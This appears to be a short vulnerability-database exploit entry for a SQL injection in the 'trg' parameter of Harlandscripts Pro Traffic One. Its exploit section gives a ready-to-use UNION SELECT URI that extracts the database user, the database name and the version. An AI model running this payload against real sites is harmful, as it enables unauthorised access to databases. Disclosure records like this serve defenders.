• info
• discussion
• exploit
• solution
• references

Harlandscripts Pro Traffic One 'trg' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28--